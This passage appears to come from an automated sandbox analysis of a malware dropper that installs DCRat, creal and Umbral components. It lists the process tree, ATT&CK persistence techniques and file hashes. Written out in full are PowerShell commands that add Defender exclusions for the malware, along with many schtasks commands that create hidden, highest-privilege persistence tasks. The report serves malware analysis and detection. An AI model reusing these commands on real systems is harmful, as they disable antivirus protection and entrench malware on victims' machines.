wrote to memory of 2008 2476 Chainblock.exe 127 PID 2476 wrote to memory of 2008 2476 Chainblock.exe 127 PID 2008 wrote to memory of 2816 2008 cmd.exe 129 PID 2008 wrote to memory of 2816 2008 cmd.exe 129 PID 2008 wrote to memory of 2816 2008 cmd.exe 129 PID 2008 wrote to memory of 1692 2008 cmd.exe 130 PID 2008 wrote to memory of 1692 2008 cmd.exe 130 PID 2008 wrote to memory of 1692 2008 cmd.exe 130 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\inj.vmp.exe"C:\Users\Admin\AppData\Local\Temp\inj.vmp.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Users\Admin\AppData\Local\Temp\111.exe"C:\Users\Admin\AppData\Local\Temp\111.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\111.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '111.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\drivers win gui32-64.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'drivers win gui32-64.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\driverdllnetdhcp\F9mnHWtyAUd0Q4P2aZ3fzq.vbe"3⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\driverdllnetdhcp\nZjz3z5F13Ya5AH4Q7c.bat" "4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\driverdllnetdhcp\Chainblock.exe"C:\driverdllnetdhcp\Chainblock.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ycaMgafzeK.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:1800
-
-
C:\driverdllnetdhcp\Chainblock.exe"C:\driverdllnetdhcp\Chainblock.exe"7⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\f3YgPfhNWN.bat"8⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:2816
-
-
C:\Users\Default User\Idle.exe"C:\Users\Default User\Idle.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\creal.exe"C:\Users\Admin\AppData\Local\Temp\creal.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Users\Admin\AppData\Local\Temp\creal.exe"C:\Users\Admin\AppData\Local\Temp\creal.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\My Documents\creal.exe'" /f1⤵
- Process spawned unexpected child process
PID:1676
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\Users\Admin\My Documents\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\My Documents\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 12 /tr "'C:\driverdllnetdhcp\creal.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2288
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\driverdllnetdhcp\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 14 /tr "'C:\driverdllnetdhcp\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2524
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Mail\es-ES\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\es-ES\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Mail\es-ES\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2604
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2472
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\Visualizations\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\Visualizations\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Common Files\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2824
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 8 /tr "'C:\Windows\Help\Windows\ja-JP\creal.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\Windows\Help\Windows\ja-JP\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1476
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\Windows\ja-JP\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\Idle.exe'" /f1⤵
- Process spawned unexpected child process
PID:1324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:296
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "1111" /sc MINUTE /mo 13 /tr "'C:\driverdllnetdhcp\111.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "111" /sc ONLOGON /tr "'C:\driverdllnetdhcp\111.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:2932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "1111" /sc MINUTE /mo 12 /tr "'C:\driverdllnetdhcp\111.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1808
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\driverdllnetdhcp\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\driverdllnetdhcp\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1868
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\driverdllnetdhcp\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\lsm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 5 /tr "'C:\Windows\system\creal.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\Windows\system\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2064
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 12 /tr "'C:\Windows\system\creal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\Network Sharing\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\wininit.exe'" /f1⤵
- Process spawned unexpected child process
PID:312
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1728
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:908
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:1044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\driverdllnetdhcp\lsm.exe'" /f1⤵
- Process spawned unexpected child process
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\driverdllnetdhcp\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\driverdllnetdhcp\lsm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Google\Temp\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
PID:1560
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Google\Temp\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1712
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /rl HIGHEST /f1⤵
- Creates scheduled task(s)
PID:3016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\5b7985c2-d100-11ee-bb00-c695cbc44580\csrss.exe'" /rl HIGHEST /f1⤵
- Creates scheduled task(s)
PID:2724
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Idle.exe'" /f1⤵
- Creates scheduled task(s)
PID:276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f1⤵
- Creates scheduled task(s)
PID:704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f1⤵
- Creates scheduled task(s)
PID:1504
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\creal.exe'" /f1⤵
- Creates scheduled task(s)
PID:1528
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "creal" /sc ONLOGON /tr "'C:\Windows\L2Schemas\creal.exe'" /rl HIGHEST /f1⤵
- Creates scheduled task(s)
PID:780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crealc" /sc MINUTE /mo 6 /tr "'C:\Windows\L2Schemas\creal.exe'" /rl HIGHEST /f1⤵
- Creates scheduled task(s)
PID:812
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\explorer.exe'" /f1⤵
- Creates scheduled task(s)
PID:1844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\explorer.exe'" /rl HIGHEST /f1⤵
- Creates scheduled task(s)
PID:1432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\explorer.exe'" /rl HIGHEST /f1⤵PID:2824
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:1428
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
928B
MD55992a46bfc0f098d308279dd4a6820ce
SHA19de43ad3ee8284b1880ea794d7fdd02af4381ea7
SHA256c9c055c79dbe3e7ef431f6326e26dc6f663d5a2eae2062d5091758c5fa489f59
SHA51236c42ee530c7a813449c6431b31b5c99ca0151730b7717dba188bd241394908a8e7b18ecb32e54a85ad464cdbd0cb0d3cc8b5a766171f349d43d380f8261bb50
-
Filesize
137KB
MD54fc9af76328e9a763c13fe118909f60f
SHA15891202c4d6c64e679d5ae4ef588da148a75fcfa
SHA256be5b3394726c2808f0e5a136715c9510f8aad48bda39e1427ec4bfd07cbb7929
SHA51281904986bce26164d6e8bc7d26c238eddd6fee9283cd3a8c50e23bbeeb715d4df92c2be06e1d480a2205fdfea4e54f221b3dde476f13702e08dece8908d8665d
-
Filesize
231KB
MD5ac6128ddf92997f4fb93fc7e96b41688
SHA1c44d5ea1485c767f38e3d25861949ad0622b1eb9
SHA256056deb66464141ad23d618146d95f9c153c519b0883c5485b202065fa918a77c
SHA5123b23043761c2b78de8b421dc251f921853699280f33935fe4125690324d50b493c3c871313197e21dfe72916156e6768c1eba712a1be545ed381cbdf11a23a68
-
Filesize
6.6MB
MD53c388ce47c0d9117d2a50b3fa5ac981d
SHA1038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35
-
Filesize
16.2MB
MD58709fcddb975efe3ec1832fc640fb0be
SHA1cb1746fed0bcccab20e85001940bf2a5c07df8e2
SHA25625a115a9373ccd98036c5ede2b36894d53e8d80daf4904d75a1af85d842b8e50
SHA512e3f89cff6f357c4aae9fc56db4ead7be39b2819585ac01a0be37b05b1022d5f163b2f0b626d0dbf51972d2baeac138f0e56fa43d62b73f4ceafc38776d46597c
-
Filesize
195B
MD57d3397c32bbeb89ded747a8c085dbab3
SHA114c2278557f994d9b5ee0251eda31e3fe918b321
SHA256d2c712ce23cc374d013318560da827de13655cec13a3a18e97782d3dad47d291
SHA5123325add8188514f6a6f69ce31cd17c5dfa6f28ee5b6dee575a4fe7490b8f50fdbe970d21ef8d62df986bf9cc41294e678c792ba0b1224b2c8dce8bf6f5c1d2a0
-
Filesize
199B
MD54dabc321d29ca11be59c7c30cc107421
SHA134bef8a70b27199ecb7287fe804486fcba492ba4
SHA256e11992ea5d8b42090cf08ad12ce46c312cda41a22773c704bcdb6fdc1c251916
SHA5128e32a99f7c7208b9c5ac6b339632f0c07d85948178d54bbebc377524f2345eea2e0ac51519faa974bd13b8aae7f97c72e550a414947cc84082930ab58553a99a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O0L57LVF05L63ZU8YMTM.temp
Filesize7KB
MD50f8193dc149a445c957e022720d8f917
SHA1896c23a14d09b8416a64661eabd18f89a1f705b1
SHA2563e9accbcdbc5d8c2db180d022018b58f5d00597068f3a2c18449530a5e0f076f
SHA51230f4f1f1154470ab22115cde6006981f2fcb7cb767f440d7608838b7a9b8ada617b66e34c5eb441824876521cb92c2d5a10f5d4af1cbd8be9870ee3320abc923
-
Filesize
1.0MB
MD556618cfc4ca3d949bee86a3c17da1588
SHA13fdc6e4f75f5376d67ec070e4c3e1821726f9af4
SHA256e93b54c6d98c32501c0b09166c8d4bb24d22369055786462b7bbc6b96c3d0fc7
SHA5129f468fbcd5c21beaba8a041fcd34463b0d7a21d2f904f4eab4f444ea9b5d8441c6752b90e747b9be6c65b94073b868c5f2e4062cdb45656e8aa4fbab016b13c6
-
Filesize
213B
MD5dbc5df53473b6a35f1b729b6cf2000b8
SHA16ae3f088d012cfde80cbe805c6657bfa2b4c1b0e
SHA25687861eb569a57fe9e25b2a0ab0f79bbf9859b4710eef852dd51327a804421061
SHA512675125b9371b02ce259d7ffa1218e8c0e23184fa90cdabbde31777d4f56c47ee2509b5efd35edaf2495b74266332faafccffa6aba878446887e4d9d4e659e746
-
Filesize
36B
MD55e1a8c832b11608f3f601dd893d062a0
SHA109a7360894c7c51fa5c8e5e8e554a62178990944
SHA25605af611254e04da3c15a5f203dba1084e7ce9e1191806662a7a85c5e24376cfe
SHA51223c1bcc579c204590084c4964eb576ce681b0b1458777ceac3039933f2e7c01e8f7d9fe104113288c8974b19e14aee6b81d08cf5d96adf4070e97b9a15b4f274
-
Filesize
1.3MB
MD5cff73d5e7ef746ce500f30043fdf94ab
SHA11ec1699154e1825d5108839099391f1c55bfc4bc
SHA256fad0dee1597da34d116c31112b720c17b63c636a9c836f30db36dfb212c8229b
